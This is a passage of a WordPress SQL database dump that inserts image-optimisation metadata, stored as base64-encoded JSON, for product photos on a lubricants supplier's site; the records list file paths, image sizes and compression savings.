W1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOVwvVGVmbG9uZS1NdWx0aS11c2UtMjAweDIwMC5qcGciLCJyZWR1Y3Rpb24iOjQ5MSwidGltZSI6MTQ4MzU2MzIwMywiaWQiOjE3OTB9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvVGVmbG9uZS1NdWx0aS11c2UtMjI1eDIyNS5qcGciLCJ3aWR0aCI6MjI1LCJoZWlnaHQiOjIyNSwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9UZWZsb25lLU11bHRpLXVzZS0yMjV4MjI1LmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDlcL1RlZmxvbmUtTXVsdGktdXNlLTIyNXgyMjUuanBnIiwicmVkdWN0aW9uIjo0OTcsInRpbWUiOjE0ODM1NjMyMDYsImlkIjoxNzkwfSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL1RlZmxvbmUtTXVsdGktdXNlLTUxMHg2MDAuanBnIiwid2lkdGgiOjUxMCwiaGVpZ2h0Ijo2MDAsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvVGVmbG9uZS1NdWx0aS11c2UtNTEweDYwMC5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA5XC9UZWZsb25lLU11bHRpLXVzZS01MTB4NjAwLmpwZyIsInJlZHVjdGlvbiI6MTI2OSwidGltZSI6MTQ4MzU2MzIxMCwiaWQiOjE3OTB9LHsidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9UZWZsb25lLU11bHRpLXVzZS0xNjB4MTYwLmpwZyIsImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL1RlZmxvbmUtTXVsdGktdXNlLTE2MHgxNjAuanBnIiwid2lkdGgiOiIxNjAiLCJoZWlnaHQiOiIxNjAiLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOVwvVGVmbG9uZS1NdWx0aS11c2UtMTYweDE2MC5qcGciLCJyZWR1Y3Rpb24iOjQ4OSwidGltZSI6MTQ4MzU2MzIxMywiaWQiOjE3OTB9LHsidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9UZWZsb25lLU11bHRpLXVzZS0yMjV4MzYwLmpwZyIsImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL1RlZmxvbmUtTXVsdGktdXNlLTIyNXgzNjAuanBnIiwid2lkdGgiOiIyMjUiLCJoZWlnaHQiOiIzNjAiLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOVwvVGVmbG9uZS1NdWx0aS11c2UtMjI1eDM2MC5qcGciLCJyZWR1Y3Rpb24iOjk2MCwidGltZSI6MTQ4MzU2MzIxNywiaWQiOjE3OTB9LHsidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9UZWZsb25lLU11bHRpLXVzZS0zMDB4MzAwLmpwZyIsImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL1RlZmxvbmUtTXVsdGktdXNlLTMwMHgzMDAuanBnIiwid2lkdGgiOiIzMDAiLCJoZWlnaHQiOiIzMDAiLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOVwvVGVmbG9uZS1NdWx0aS11c2UtMzAweDMwMC5qcGciLCJyZWR1Y3Rpb24iOjc3NywidGltZSI6MTQ4MzU2MzIyMCwiaWQiOjE3OTB9LHsidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9UZWZsb25lLU11bHRpLXVzZS00NTB4MzAwLmpwZyIsImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL1RlZmxvbmUtTXVsdGktdXNlLTQ1MHgzMDAuanBnIiwid2lkdGgiOiI0NTAiLCJoZWlnaHQiOiIzMDAiLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOVwvVGVmbG9uZS1NdWx0aS11c2UtNDUweDMwMC5qcGciLCJyZWR1Y3Rpb24iOjg5NiwidGltZSI6MTQ4MzU2MzIyNCwiaWQiOjE3OTB9LHsidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9UZWZsb25lLU11bHRpLXVzZS05MHg5MC5qcGciLCJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9UZWZsb25lLU11bHRpLXVzZS05MHg5MC5qcGciLCJ3aWR0aCI6IjkwIiwiaGVpZ2h0IjoiOTAiLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOVwvVGVmbG9uZS1NdWx0aS11c2UtOTB4OTAuanBnIiwicmVkdWN0aW9uIjo0MDYsInRpbWUiOjE0ODM1NjMyMjcsImlkIjoxNzkwfV0='); 
INSERT INTO `wp_postmeta` VALUES (29176, 1789, 'wpfc_optimisation_reduction', '24754'); 
INSERT INTO `wp_postmeta` VALUES (29177, 1789, 'wpfc_optimisation', 'W3siZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvVGVmbG9uLW11bHRpLXVzZS5qcGciLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL1RlZmxvbi1tdWx0aS11c2UuanBnIiwid2lkdGgiOjUxODQsImhlaWdodCI6MzQ1NiwibWltZV90eXBlIjoiIiwiZXJyb3JfY29kZSI6OSwidGltZSI6MTQ4MzU2MzIzMiwiaWQiOiIxNzg5In0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9UZWZsb24tbXVsdGktdXNlLTM0MHgzNDAuanBnIiwid2lkdGgiOjM0MCwiaGVpZ2h0IjozNDAsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvVGVmbG9uLW11bHRpLXVzZS0zNDB4MzQwLmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDlcL1RlZmxvbi1tdWx0aS11c2UtMzQweDM0MC5qcGciLCJyZWR1Y3Rpb24iOjgwMCwidGltZSI6MTQ4MzU2MzIzNSwiaWQiOjE3ODl9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvVGVmbG9uLW11bHRpLXVzZS04MDB4NTMzLmpwZyIsIndpZHRoIjo4MDAsImhlaWdodCI6NTMzLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL1RlZmxvbi1tdWx0aS11c2UtODAweDUzMy5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA5XC9UZWZsb24tbXVsdGktdXNlLTgwMHg1MzMuanBnIiwicmVkdWN0aW9uIjoyODY0LCJ0aW1lIjoxNDgzNTYzMjQwLCJpZCI6MTc4OX0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9UZWZsb24tbXVsdGktdXNlLTc2OHg1MTIuanBnIiwid2lkdGgiOjc2OCwiaGVpZ2h0Ijo1MTIsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvVGVmbG9uLW11bHRpLXVzZS03Njh4NTEyLmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDlcL1RlZmxvbi1tdWx0aS11c2UtNzY4eDUxMi5qcGciLCJyZWR1Y3Rpb24iOjI2MDYsInRpbWUiOjE0ODM1NjMyNDMsImlkIjoxNzg5fSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL1RlZmxvbi1tdWx0aS11c2UtMTYwMHgxMDY3LmpwZyIsIndpZHRoIjoxNjAwLCJoZWlnaHQiOjEwNjcsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvVGVmbG9uLW11bHRpLXVzZS0xNjAweDEwNjcuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOVwvVGVmbG9uLW11bHRpLXVzZS0xNjAweDEwNjcuanBnIiwicmVkdWN0aW9uIjoxMTgwOCwidGltZSI6MTQ4MzU2MzI0NywiaWQiOjE3ODl9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvVGVmbG9uLW11bHRpLXVzZS0yNTB4MjUwLmpwZyIsIndpZHRoIjoyNTAsImhlaWdodCI6MjUwLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL1RlZmxvbi1tdWx0aS11c2UtMjUweDI1MC5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA5XC9UZWZsb24tbXVsdGktdXNlLTI1MHgyNTAuanBnIiwicmVkdWN0aW9uIjo2MDUsInRpbWUiOjE0ODM1NjMyNTEsImlkIjoxNzg5fSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL1RlZmxvbi1tdWx0aS11c2UtMjAweDIwMC5qcGciLCJ3aWR0aCI6MjAwLCJoZWlnaHQiOjIwMCwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9UZWZsb24tbXVsdGktdXNlLTIwMHgyMDAuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOVwvVGVmbG9uLW11bHRpLXVzZS0yMDB4MjAwLmpwZyIsInJlZHVjdGlvbiI6NDk3LCJ0aW1lIjoxNDgzNTYzMjU0LCJpZCI6MTc4OX0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9UZWZsb24tbXVsdGktdXNlLTIyNXgyMjUuanBnIiwid2lkdGgiOjIyNSwiaGVpZ2h0IjoyMjUsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvVGVmbG9uLW11bHRpLXVzZS0yMjV4MjI1LmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDlcL1RlZmxvbi1tdWx0aS11c2UtMjI1eDIyNS5qcGciLCJyZWR1Y3Rpb24iOjU2OSwidGltZSI6MTQ4MzU2MzI1NywiaWQiOjE3ODl9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvVGVmbG9uLW11bHRpLXVzZS01MTB4NjAwLmpwZyIsIndpZHRoIjo1MTAsImhlaWdodCI6NjAwLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL1RlZmxvbi1tdWx0aS11c2UtNTEweDYwMC5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA5XC9UZWZsb24tbXVsdGktdXNlLTUxMHg2MDAuanBnIiwicmVkdWN0aW9uIjoxNzY2LCJ0aW1lIjoxNDgzNTYzMjYxLCJpZCI6MTc4OX0seyJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL1RlZmxvbi1tdWx0aS11c2UtMTYweDE2MC5qcGciLCJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9UZWZsb24tbXVsdGktdXNlLTE2MHgxNjAuanBnIiwid2lkdGgiOiIxNjAiLCJoZWlnaHQiOiIxNjAiLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOVwvVGVmbG9uLW11bHRpLXVzZS0xNjB4MTYwLmpwZyIsInJlZHVjdGlvbiI6NDE4LCJ0aW1lIjoxNDgzNTYzMjY0LCJpZCI6MTc4OX0seyJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL1RlZmxvbi1tdWx0aS11c2UtMjI1eDM2MC5qcGciLCJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9UZWZsb24tbXVsdGktdXNlLTIyNXgzNjAuanBnIiwid2lkdGgiOiIyMjUiLCJoZWlnaHQiOiIzNjAiLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOVwvVGVmbG9uLW11bHRpLXVzZS0yMjV4MzYwLmpwZyIsInJlZHVjdGlvbiI6NzM4LCJ0aW1lIjoxNDgzNTYzMjY4LCJpZCI6MTc4OX0seyJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL1RlZmxvbi1tdWx0aS11c2UtMzAweDMwMC5qcGciLCJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9UZWZsb24tbXVsdGktdXNlLTMwMHgzMDAuanBnIiwid2lkdGgiOiIzMDAiLCJoZWlnaHQiOiIzMDAiLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOVwvVGVmbG9uLW11bHRpLXVzZS0zMDB4MzAwLmpwZyIsInJlZHVjdGlvbiI6NzMyLCJ0aW1lIjoxNDgzNTYzMjcxLCJpZCI6MTc4OX0seyJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL1RlZmxvbi1tdWx0aS11c2UtNDUweDMwMC5qcGciLCJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9UZWZsb24tbXVsdGktdXNlLTQ1MHgzMDAuanBnIiwid2lkdGgiOiI0NTAiLCJoZWlnaHQiOiIzMDAiLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOVwvVGVmbG9uLW11bHRpLXVzZS00NTB4MzAwLmpwZyIsInJlZHVjdGlvbiI6OTY3LCJ0aW1lIjoxNDgzNTYzMjc0LCJpZCI6MTc4OX0seyJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL1RlZmxvbi1tdWx0aS11c2UtOTB4OTAuanBnIiwiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvVGVmbG9uLW11bHRpLXVzZS05MHg5MC5qcGciLCJ3aWR0aCI6IjkwIiwiaGVpZ2h0IjoiOTAiLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOVwvVGVmbG9uLW11bHRpLXVzZS05MHg5MC5qcGciLCJyZWR1Y3Rpb24iOjM4NCwidGltZSI6MTQ4MzU2MzI3OCwiaWQiOjE3ODl9XQ=='); 
INSERT INTO `wp_postmeta` VALUES (29178, 1788, 'wpfc_optimisation_reduction', '19909'); 
INSERT INTO `wp_postmeta` VALUES (29179, 1788, 'wpfc_optimisation', 'W3siZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvU2lsaWNvbmUtb2lsLWx1YnJpY2FudC5qcGciLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL1NpbGljb25lLW9pbC1sdWJyaWNhbnQuanBnIiwid2lkdGgiOjUxODQsImhlaWdodCI6MzQ1NiwibWltZV90eXBlIjoiIiwiZXJyb3JfY29kZSI6OSwidGltZSI6MTQ4MzU2MzI4MiwiaWQiOiIxNzg4In0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9TaWxpY29uZS1vaWwtbHVicmljYW50LTM0MHgzNDAuanBnIiwid2lkdGgiOjM0MCwiaGVpZ2h0IjozNDAsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvU2lsaWNvbmUtb2lsLWx1YnJpY2FudC0zNDB4MzQwLmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDlcL1NpbGljb25lLW9pbC1sdWJyaWNhbnQtMzQweDM0MC5qcGciLCJyZWR1Y3Rpb24iOjY3OSwidGltZSI6MTQ4MzU2MzI4NiwiaWQiOjE3ODh9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvU2lsaWNvbmUtb2lsLWx1YnJpY2FudC04MDB4NTMzLmpwZyIsIndpZHRoIjo4MDAsImhlaWdodCI6NTMzLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL1NpbGljb25lLW9pbC1sdWJyaWNhbnQtODAweDUzMy5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA5XC9TaWxpY29uZS1vaWwtbHVicmljYW50LTgwMHg1MzMuanBnIiwicmVkdWN0aW9uIjoyMjUyLCJ0aW1lIjoxNDgzNTYzMjg5LCJpZCI6MTc4OH0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9TaWxpY29uZS1vaWwtbHVicmljYW50LTc2OHg1MTIuanBnIiwid2lkdGgiOjc2OCwiaGVpZ2h0Ijo1MTIsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvU2lsaWNvbmUtb2lsLWx1YnJpY2FudC03Njh4NTEyLmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDlcL1NpbGljb25lLW9pbC1sdWJyaWNhbnQtNzY4eDUxMi5qcGciLCJyZWR1Y3Rpb24iOjIwNTgsInRpbWUiOjE0ODM1NjMyOTMsImlkIjoxNzg4fSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL1NpbGljb25lLW9pbC1sdWJyaWNhbnQtMTYwMHgxMDY3LmpwZyIsIndpZHRoIjoxNjAwLCJoZWlnaHQiOjEwNjcsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvU2lsaWNvbmUtb2lsLWx1YnJpY2FudC0xNjAweDEwNjcuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOVwvU2lsaWNvbmUtb2lsLWx1YnJpY2FudC0xNjAweDEwNjcuanBnIiwicmVkdWN0aW9uIjo5NDA2LCJ0aW1lIjoxNDgzNTYzMjk3LCJpZCI6MTc4OH0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9TaWxpY29uZS1vaWwtbHVicmljYW50LTI1MHgyNTAuanBnIiwid2lkdGgiOjI1MCwiaGVpZ2h0IjoyNTAsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvU2lsaWNvbmUtb2lsLWx1YnJpY2FudC0yNTB4MjUwLmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6Ilw